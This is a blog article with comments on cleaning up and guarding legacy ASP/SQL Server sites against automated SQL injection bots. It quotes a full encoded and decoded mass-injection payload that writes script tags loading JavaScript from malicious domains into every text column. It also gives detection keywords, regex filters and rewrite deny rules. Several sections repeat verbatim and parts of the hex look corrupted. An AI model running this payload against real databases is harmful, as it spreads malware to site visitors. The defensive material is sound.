SQL injection attacks seem to be on the rise lately not because there are more dedicated hackers spending time trying to exploit sites but because most of the successful attacks are caused by bots that trawl the net 24/7 hammering sites. Now we all supposedly should know by now how to prevent SQL injection from affecting your systems but if you have a large back catalogue of older sites that were created years ago that are still in production then they are going to be very vulnerable in the current climate. Even if these sites receive little or no traffic normally if they are accessible on the Internet they are much more likely to become victim because of these bots.
This article will look at the various ways of preventing and recovering from an attack without having to spend months re-writing all those old sites to future proof them. If people still use these old sites then they should be expected to work and not greet the user with Googles Reported Hack Site page. However we all know time is money and the money is in new developments not rewriting that old online ladies shoe catalogue that was written in 98.
Latest forms of SQL Injection
Currently the biggest automated SQL injection attack comes from derivatives of the following:
;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0×4445434C415245204054207661726368617228323535
292C4043207661263686172283430303029204445434C415245205461626C655F437572736F7220
435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D2073797
36F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420
616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747
970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50
454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4
37572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432
B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D226874
74703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207
76865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73637269
7074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7323E3C2F7363726970
743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F722
0494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C
4F43415445205461626C655F437572736F72%20AS%20NVARCHAR(4000));EXEC(@S);
Which tries to obfuscate the main section of the code by using a local variable to hold an encoded string that is then decoded and executed. If we decode the main section we can see that the code is making use of the system tables to loop through all textual columns and inserting script tags that reference a compromised site.
;DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name
FROM sysobjects a,syscolumns b
WHERE a.id=b.id and a.xtype='u'
and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor
INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://www.vtg43.ru/script.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://www.vtg43.ru/script.js"></script><!--''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
There are numerous variations of this hack with the major differences being
-The URI of the SCRIPT tag injected into the columns.
-The name and datatype of the main variable.
-Whether the UPDATE statement inserts the SCRIPT tag at the start or end of existing data or overwrites it totally.
See my post latest SQL injection URIs for a list of the sites currently doing the rounds.
So before we look at the various hack sticking plasters that can be applied lets just clarify that the best way to avoid SQL injection is to design and develop your site following best practise guidelines.
The best security is a layered approach that involves multiple barriers to make these pesky bots life as difficult as possible. So just to ensure that you all know that I am not recommending a plaster as the number 1 SQL injection prevention method I will just summarise some of the best practises that should be utilised when developing new systems.
Prevention with good design.
The following should all be common knowledge by now as SQL injection is not some newly discovered threat against web kind but has been around and evolving for many years. When developing new sites or upgrading legacy systems you should try to follow these basic rules as developing with this threat in mind as apposed to an after thought will always be the best mode of prevention.
- Validate all input taken from the client application that is to be passed to the database using a white list rather than blacklisting approach. This basically means rather than stripping out certain characters and symbols only allow those that the field you are updating requires. This means checking the data type and length of the value and handling anything inappropriate.
- Use stored procedures or parametrised queries. Let ADO handle any data type conversions and quote escaping. If you are used to building up strings to execute then this means you have to rely on your own foolproof coding skills to ensure that each value appended to the string is the correct format and escaped correctly. You may think that you would never make such a stupid mistake as to forget to validate each value you add to the string but say you were off ill one day or on holiday and a junior or a colleague had to make an edit to a page on your site. For example if the required amend is to add a listbox to a page that lists news articles to allow the user to filter by a particular news category that is identified and retrieved from the database using an integer. If they forget to validate the value supplied from the listbox to make sure it was an integer then you can be guaranteed that one of these automated hack bots will exploit it within days if not hours of the change going live. I have had this exact same situation happen myself on a major system. When the change made by my colleague went live at 11pm at night by 7am the following morning the whole site had been compromised because of this one lapse in their concentration. If you think that using command objects and parameters are too long winded and complicated to write then create yourself a helper script that will make use of the commands parameter.refresh method to build the code up you require.
- Only grant the database logon that the website users connect with the minimum privileges they require. Don't give them automatic write access and make sure all your CUD (create, update, delete) operations are carried out from stored procedures that the user has execute permission on. I know a lot of people do not like the overhead of creating a stored procedure for simple SELECTs that may only exist to populate a dropdown and therefore use a mixture of stored procedures and client side dynamic SQL which is fine but by following this rule then even if the hacker finds a hole in one of your client side SELECT statements to exploit they would not have the sufficient privileges to update the database.
- If you have to use dynamic SQL in stored procedures that accept values from the site then use sp_executesql and not exec. A hacker could still exploit your system if you executed an unvalidated string within a stored procedure using exec(). You will also gain benefits from the system caching and therefore reusing the generated query plans when you use this system procedure to execute your dynamic SQL instead of exec.
- Make life hard for the hackers and don't show detailed error messages to your users when something goes wrong. Although the automated hack bots are using brute force to hit every possible URL and parameter possible in the hope of finding a hole a dedicated hacker probing your site feeds off the details provided to him when he comes across a 500 error. Although its still possible to exploit a site in the blind its a lot harder and more time consuming than having the details of the SQL you are manipulating in front of you. Its amazing how many sites I still come across that show the SQL statement in the error messages. In fact a very popular developer resource site (I will mention no names) that hosts message boards and technical articles including some about SQL injection best practises continues to show me the SQL statement it uses to log members in when I visit and it times out. End users do not need to see this information as its dangerous. Show them a nice friendly error message and then email yourself the details or log them to a file or database if you really need to know what caused the error.
Oops someone just hacked your site.
So you have just had a phone call from an angry customer complaining about a virus they have just been infected with because they still use IE 5 to browse the web and they have just visited the home page of their site that your company hosts. Or maybe you have received one of Googles nice warning messages when you try to access the site yourself. Or maybe you just noticed the layout is screwed up because of broken tags and truncated HTML due to newly inserted SCRIPT tags that shouldn't be there. However you found the wonderful news out that your site has been exploited you need to get moving as fast as possible and you need to know 2 main things:
1. How did they managed to hack the site.
2. How much data has been compromised or even worse deleted.
Find the hole in the system.
There are many security and logging systems available for purchase but I have a custom logging system on my sites that at the bottom of each page will log to a separate database some core information about the user and the page they are on (user-agent, client IP, URL etc) as well as using this for reporting traffic and user statistics I have columns called IsHackAttempt and IsError and a timed MS Agent job that every 15 minutes looks at the last 15 minutes of unchecked traffic data and checks the query-string for common SQL/XSS injection fingerprints. If it finds any then I update the IsHackAttempt flag.
This enables me to run a report of all hack attempts over a set time period. You may find on large systems that you are constantly under attack from these bots so you should look for hack attempts that have been on pages that have just been updated or that have caused 500 errors. If you have SQL injection attempts that cause any sort of 500 error then you should investigate immediately as something is not right. If a hacker can raise an SQL error on your system then it means its highly probable they can manipulate your SQL probably due to incorrect parameter sanitization.
If you don't have your own custom logging system then you can either hunt through your log files using a tool such as Microsoft's Log Parser http://www.securityfocus.com/infocus/1712 or bulk load the log files into a database for easy searching using SQL.
Some keywords and terms you should be looking for in GET data that would indicate an SQL hack attempt would include: exec, select, drop, delete, sys.objects, sysobjects, sys.columns, syscolumns, cast, varchar, user, @@version, @@servername, declare, update, table.
Most hacks will be through the query-string and therefore you should be able to find the hack in the log file. Hacks from a posted request will not be discovered in the log file unless you have written a custom method to log POST data which I doubt many people do due to the overhead.
Use a bot to beat the bots.
There are many tools out there which help you find holes in your site and unfortunately they are also used by hackers to find the holes in your site so do yourself a favour and beat them to it.
If you don't have your own custom logging system then you can either hunt through your log files using a tool such as Microsoft's Log Parser http://www.securityfocus.com/infocus/1712 or bulk load the log files into a database for easy searching using SQL.
Some keywords and terms you should be looking for in GET data that would indicate an SQL hack attempt would include: exec, select, drop, delete, sys.objects, sysobjects, sys.columns, syscolumns, cast, varchar, user, @@version, @@servername, declare, update, table.
Most hacks will be through the query-string and therefore you should be able to find the hack in the log file. Hacks from a posted request will not be discovered in the log file unless you have written a custom method to log POST data which I doubt many people do due to the overhead.
Use a bot to beat the bots.
There are many tools out there which help you find holes in your site and unfortunately they are also used by hackers to find the holes in your site so do yourself a favour and beat them to it.
Before any site goes live you should run a tool such as Paros Proxy http://www.parosproxy.org which will crawl your site and output a nice report detailing all possible exploitable holes in your system. As well as SQL injection it will look for XSS, CRLF and many other possible hacks. Run this against your development system as running it on the production system will slow it down as well as possibly filling your database up with crap if you do have exploitable holes. Once you have run this tool view the report and investigate all pages that have been flagged as possible sources for a hacker to hit.
A database restore is not always the answer.
The most common automated hacks at the moment involve an encoded SQL command that makes use of the system views available in SQL Server to output multiple UPDATE statements to insert a <script> tag in every possible text based column (char, varchar, nchar, nvarchar, text, ntext) in the database. This script will usually reference a .js file on some URL that tries to exploit well known holes in some older browsers through IFrames to download viruses and other spyware to the clients PC. Once you know the actual <script> tag that the exploit is using you can search your database to see how much data has been affected. It maybe that a backup restoration is not required and there is no point loosing customer data by restoring the last known safe backup when its not required.
Hunting for affected rows and columns.
Using a script such as my find text within database script you can see how much of your data is affected. It maybe that the SQL run by the hacker reached its command timeout limit before it could affect all your tables and especially if you have a large database system only a small percentage of the data could be affected. Its also important to know whether the hacker has purposely or accidentally overwritten or deleted any data as well as inserting his <script> tag. I have seen hacks where the value for the column being updated was wrapped in a CAST(column as VARCHAR) statement which meant that anything after 30 characters was lost. This is because the default length when no value is supplied for a CAST Varchar/Char is 30 characters long. This would mean your column would contain your reference to the virus infected site and nothing else and in this case a simple replace would not be helpful as even if you removed it you would still be missing data.
If the hacker has only inserted the <script> at the start or the end of the existing text which seems to be the most common type then we can easily remove the offending HTML by either using a script like my find and replace or reversing the code that the hacker used in the first place.
A database restore is not always the answer.
The most common automated hacks at the moment involve an encoded SQL command that makes use of the system views available in SQL Server to output multiple UPDATE statements to insert a <script> tag in every possible text based column (char, varchar, nchar, nvarchar, text, ntext) in the database. This script will usually reference a .js file on some URL that tries to exploit well known holes in some older browsers through IFrames to download viruses and other spyware to the clients PC. Once you know the actual <script> tag that the exploit is using you can search your database to see how much data has been affected. It maybe that a backup restoration is not required and there is no point loosing customer data by restoring the last known safe backup when its not required.
Hunting for affected rows and columns.
Using a script such as my find text within database script you can see how much of your data is affected. It maybe that the SQL run by the hacker reached its command timeout limit before it could affect all your tables and especially if you have a large database system only a small percentage of the data could be affected. Its also important to know whether the hacker has purposely or accidentally overwritten or deleted any data as well as inserting his <script> tag. I have seen hacks where the value for the column being updated was wrapped in a CAST(column as VARCHAR) statement which meant that anything after 30 characters was lost. This is because the default length when no value is supplied for a CAST Varchar/Char is 30 characters long. This would mean your column would contain your reference to the virus infected site and nothing else and in this case a simple replace would not be helpful as even if you removed it you would still be missing data.
If the hacker has only inserted the <script> at the start or the end of the existing text which seems to be the most common type then we can easily remove the offending HTML by either using a script like my find and replace or reversing the code that the hacker used in the first place.
To reverse engineer the exploit you should URLDecode the string, remove any EXEC(@s) statement at the end so you don't accidentally run it again and replace it with a PRINT or SELECT so that when you run the SQL you will actually see the CURSOR/LOOP that the exploit is using. You can then replace the hackers UPDATE statement with one that REPLACEs the injected code with nothing.
Preventing re-infection.
Now we have removed the offending HTML or Javascript we need to ensure that we don't get re-infected. If we haven't managed to find the code that allowed the hacker in and we haven't got time to either check each page or rewrite the code to future proof it then we need some sticking plasters until we do get time. I wouldn't recommend the following approaches as the only way to prevent SQL injection. However if you have a number of old sites on a server that have holes and are repeatedly getting hit then they will most certainly help filter out a large percentage of possible hack attempts and they could also be used as another layer in your multi layered security approach.
Identify those bad bots and redirect them away from your site.
If you have been logging your users and hackers then you could try blocking future hackers in a number of ways.
Identify hackers as they attack your site.
Create a global include file that can be referenced by all your pages and place it at the top of all other includes so its the first piece of code run by your site. Create a function that takes the Request.Querystring and Request.Form as parameters and check for common SQL injection fingerprints. If found redirect the user to a banned page.
Preventing re-infection.
Now we have removed the offending HTML or Javascript we need to ensure that we don't get re-infected. If we haven't managed to find the code that allowed the hacker in and we haven't got time to either check each page or rewrite the code to future proof it then we need some sticking plasters until we do get time. I wouldn't recommend the following approaches as the only way to prevent SQL injection. However if you have a number of old sites on a server that have holes and are repeatedly getting hit then they will most certainly help filter out a large percentage of possible hack attempts and they could also be used as another layer in your multi layered security approach.
Identify those bad bots and redirect them away from your site.
If you have been logging your users and hackers then you could try blocking future hackers in a number of ways.
- Block IP addresses that have been the source of hack attempts at your firewall. However the problem with this is that the IP addresses will change constantly and you are blocking after the attack has occurred.
- If your site is supposed to be a local or regional site e.g a UK jobs board then you may decide that only traffic from the UK or Europe should be allowed. You could identify the countries that generate the most hack attempts from your traffic data and then block ranges belonging to those countries. To find out the IP ranges for any country use a site such as Country IP Blocks. The problem with this approach is that in a global economy legitimate traffic could come from anywhere in the world and although China seems to be the source of the majority of the current hackbots it is also going to become the worlds major economy in the next few years so blocking the whole country may not be the best approach.
- Block by user-agent. This will only work for those hackers that don't spoof legitimate browsers and use easily identifiable agents such as Rippers or Fake IE. Why would a legitimate user have a browser named Fake IE?? I do not know either but you could block either through application code or through an ISAPI rewrite rule. There is no point using robots.txt as any hacker worthy of the name is going to ignore that.
Identify hackers as they attack your site.
Create a global include file that can be referenced by all your pages and place it at the top of all other includes so its the first piece of code run by your site. Create a function that takes the Request.Querystring and Request.Form as parameters and check for common SQL injection fingerprints. If found redirect the user to a banned page.
I have also heard the idea that on this banned page you could try and gain some revenge by running an SQL WAIT statement to consume the attackers connection time and slow them down a tad. However if you have a limit on the number of concurrent open database connections and you are being hammered by a zombie botnet then you are going to consume your connections with these WAIT commands which will be detrimental to your other legitimate visitors. This could also be used against you as a form of SQL Denial of Service attack as if a user could automate a series of requests to these pages knowing that you have a connection limit then once all the connections have been used up your site is basically out of action until a connection is released. On a database driven site this is something to be very aware of.
A message on the page informing them that they have been identified and logged will not do much good either considering most of these bots originate overseas and come from anonymous proxies or unsuspecting users who have become members of a zombie network but its worth doing anyway just to scare those teenage hackers based in your own country who may be experimenting.
Your function could look a bit like this. The code is in VBScript due to its easy readability and I'm sure most people could convert it to their preferred language with little work.
Rather than just logging attempted or successful hack attempts for reporting later this type of plaster will prevent the most common SQL injections that are currently being executed by bots. I found that after implementing this function on a site that was receiving up to 2000 hack attempts each day it dropped down to 2-5 per day.
A message on the page informing them that they have been identified and logged will not do much good either considering most of these bots originate overseas and come from anonymous proxies or unsuspecting users who have become members of a zombie network but its worth doing anyway just to scare those teenage hackers based in your own country who may be experimenting.
Your function could look a bit like this. The code is in VBScript due to its easy readability and I'm sure most people could convert it to their preferred language with little work.
Dim blBanUser : blBanUser = False
blBanUser = BanUser(Request.Querystring)
If Not(blBanUser) Then
blBanUser = BanUser(Request.Form)
End If
If (blBanUser) Then
Response.Redirect("/banned.asp")
End If
Function BanUser(strIN)
strIN = URLDecode(strIN)
Dim objRegExpr : Set objRegExpr = New RegExp
With objRegExpr
.IgnoreCase = True
.Global = True
.Pattern = "DECLARE @\w+ N?VARCHAR\((?:\d{1,4}|max)\)"
If .Test(strIN) Then
BanUser = True
Exit Function
End If
.Pattern = "sys.?(?:objects|columns|tables)"
If .Test(strIN) Then
BanUser = True
Exit Function
End If
.Pattern = ";EXEC\(@\w+\);?"
If .Test(strIN) Then
BanUser = True
Exit Function
End If
End With
Set objRegExpr = Nothing
BanUser = False
End Function
The problems with this approach are that it will slow down the response time of your site as every page load is going to have to perform these checks and the more data you submit the more there is to check. You could extend it but the more checking you do the slower it will get.
You may also decide that as the majority of hacks come through the query-string that checking the post data is not required. Also this method only checks for a few fingerprints and the SQL injections are changing all the time. It may catch 99% of the attacks currently out there but who is to say that a new type of attack that doesn't use those system tables or exec won't be rolled out in the following days. This is why some sort of logging and hack identifying system is advisable as it means you can see the types of attack that are being used against you and then modify any defensive regular expressions as required.
ISAPI Filtering.
If you have the ability to add ISAPI rewriting to your site then you can place rules that do similar regular expression fingerprint checks as the function above but before any application code is run by placing rules in an httpd.ini or .htaccess file. You can do this for one site or for the whole server.
ISAPI Filtering.
If you have the ability to add ISAPI rewriting to your site then you can place rules that do similar regular expression fingerprint checks as the function above but before any application code is run by placing rules in an httpd.ini or .htaccess file. You can do this for one site or for the whole server.
The benefits of using ISAPI rewriting is that it will be faster than getting your application to check for hack fingerprints plus you can apply the plaster to the whole server in one hit for maximum affect. The downside is that you can only check the query-string and not the post data. You also have the same issues about injection methods changing and having to update the file.
You could use the following 3 rules to prevent the majority of the automated hack bots at the moment. I have implemented these rules on my own sites and it has reduced the amount of hacks that get logged by roughly 95%.
Block access to system views.
A lot of the most current hacks make use of the system views that are available in SQL Server that list out all the tables, columns, data types and any other useful information that would be a goldmine to a hacker. Giving them access to these tables is like doing their work for them. They don't need to guess what names you have given the tables and columns in your database as they have access to a list of all of them and can easily create a statement to loop through those of interest to create havoc.
You could use the following 3 rules to prevent the majority of the automated hack bots at the moment. I have implemented these rules on my own sites and it has reduced the amount of hacks that get logged by roughly 95%.
# SQL INJECTION FINGERPRINTING
RewriteRule /.*?\.asp\?.*?DECLARE[^a-z]+\@\w+[^a-z]+N?VARCHAR\((?:\d{1,4}|max)\).* /jobboard/error-pages/banned.asp [I,L,U]
RewriteRule /.*?\.asp\?.*?sys.?(?:objects|columns|tables).* /jobboard/error-pages/banned.asp [I,L,U]
RewriteRule /(?:.*?\.asp\?.*?);EXEC\(\@\w+\);?.* /jobboard/error-pages/banned.asp [I,L,U]
Block access to system views.
A lot of the most current hacks make use of the system views that are available in SQL Server that list out all the tables, columns, data types and any other useful information that would be a goldmine to a hacker. Giving them access to these tables is like doing their work for them. They don't need to guess what names you have given the tables and columns in your database as they have access to a list of all of them and can easily create a statement to loop through those of interest to create havoc.
In the majority of cases your website would not need access to these views so blocking them would have no detremential affect however you should verify this first with developers and DBA's. I personally tend to use them in parts of the system where I allow certain admin users to upload data into the system. It enables me to output the correct format for the upload (data type, column size, allow nulls etc) without having to worry about changing code if a column gets modified. So there are perfectly valid reasons that your site may need access to these views however if your site doesn't then deny access to your website user as although it will not stop all SQL injection attacks it will stop the current crop of automated bots that make use of the system views to create the necessary UPDATE statements. So although not perfect if your system doesn't require access to them its another useful layer of protection to add.
Conclusion
SQL injection is on the rise due to automated bots which means any and all sites available on the internet could fall victim. New sites should be developed with this in mind and should be implemented with a multi layered approach to prevention. This should take the form of data validation, parameterized queries and stored procedures, least privllege access to users including denying access to system views, hiding error messages from users and the logging of hack attempts so that defenses can be kept up to date.
For a detailed look at SQL injection methods http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/.
Article about preventing SQL injection attacks in ASP.NET http://msdn.microsoft.com/en-us/library/ms998271.aspx
Conclusion
SQL injection is on the rise due to automated bots which means any and all sites available on the internet could fall victim. New sites should be developed with this in mind and should be implemented with a multi layered approach to prevention. This should take the form of data validation, parameterized queries and stored procedures, least privllege access to users including denying access to system views, hiding error messages from users and the logging of hack attempts so that defenses can be kept up to date.
For a detailed look at SQL injection methods http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/.
Article about preventing SQL injection attacks in ASP.NET http://msdn.microsoft.com/en-us/library/ms998271.aspx
6 comments:
Great article very detailed and some good tips on beating those evil bots. I think I will implement the idea of ISAPI rules to bounce hackers off to a blank page. We are getting hundreds of hack attempts a day at the moment! All from China by the looks of things.
Hi!
I created a video tutorial about SQL injection.
Take a look:
http://www.webmastervideoschool.com/blog_item.php?id=7
Hi there,
I'm looking a way to invite Google to reconsider my website http://www.youtubeviewsbuy.com/
It has been hacked and there in every page was injected a lot of hidden links to unknown sites.
So my website loose several positions in the Google serps.
How to communicate with Google since I haven't got a manual action?
(I don't see any link to their reconsideration request page)
Thanks
Andrew
I've never found a direct way to contact Google. I think they believe having a real support system would be a huge overload and require thousands of people to manage seeing the whole world uses their products. They rely on automatic forms and so on.
I have only ever had one site downgraded which was a URL shortener tool that was using the wrong kind of 300 redirect e.g 302 not 301 (temporary not permanent) and after changing the type I re-submitted my site for re-consideration in Webmaster tools using a form that is buried away in there (hopefully it is stil there - search on Google for it)
Remember there are sites that test whether your site has actually been demoted e.g >> http://pixelgroove.com/serp/sandbox_checker/
A quick way is to just search for your domain name in google and if it is NOT the top link you have been demoted.
Remember though that there are two types of demotion
1. Due to a new Google algorithm such as Panda/Penguin that has made "being mobile friendly" a key indicator in their results. So use a tool such as Googles > https://www.google.co.uk/webmasters/tools/mobile-friendly/ to test your site IS mobile friendly and if not try and make it responsive. If you use certain CMS's e.g WordPress a simple plugin installation like WP Touch will make it responsive.
2. Manual demotion due to spam, virus, hacked sites etc. Best way is to clean the site up, ensure it is safe to use and then re-submit a sitemap to Google. Also look for the form in Webmaster Tools so that you could re-submit a demoted site to them to re-consider. This is what I did when I had my demotion. After a week or so it came back to the top of Google for a domain search.
Obviously you could do a whois lookup on google and try contacting them directly at their HQ but I doubt you would get a reply. Have a search on Google for ways to contact them.
Taylor, why would an article on android apps to hack phones have anything to do with a 12 year old article on recovering from an SQL injection hack that corrupts an MS SQL database? Spam I think, link removed. People can search google for free to download keyloggers and phone tracking apps to spy on people. Link is not relevang to an SQL onjection hack attack.
Post a Comment